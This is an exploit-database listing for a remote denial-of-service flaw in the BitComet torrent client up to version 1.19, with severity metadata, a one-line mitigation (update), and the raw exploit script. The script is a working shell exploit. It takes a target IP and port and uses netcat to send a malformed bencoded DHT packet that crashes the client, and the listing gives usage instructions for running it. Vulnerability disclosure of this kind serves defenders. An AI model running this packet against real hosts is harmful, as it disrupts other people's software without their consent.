header-logo
Suggest Exploit
vendor:
BitComet
by:
Pierre Nogues
7,5
CVSS
HIGH
Remote Denial of Service (DoS)
400
CWE
Product Name: BitComet
Affected Version From: BitComet <= 1.19
Affected Version To: BitComet <= 1.19
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Unknown

BitComet <= 1.19 Remote DOS Exploit

BitComet is a torrent client which doesn't handle malicious DHT packet with an invalid bencoded message.

Mitigation:

Update to the latest version of BitComet.
Source

Exploit-DB raw data:

#!/bin/sh
#
# BitComet <= 1.19 Remote DOS Exploit
# Pierre Nogues - http://www.indahax.com/
#
# Description:
#     BitComet is a torrent client
#
#     BitComet doesn't handle malicious DHT packet with an invalid bencoded message.
#
# Affected versions :
#     BitComet <= 1.19
#
# Plateforms :
#     Windows
#
# Usage :
#     ./exploit.sh ip port

if [ $# -ne 2 ]; then
     echo "./exploit.sh ip port"
     exit 1
fi

nc -u $1 $2 << .
d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
.

Navigation

Suggest Exploit

Services By CQR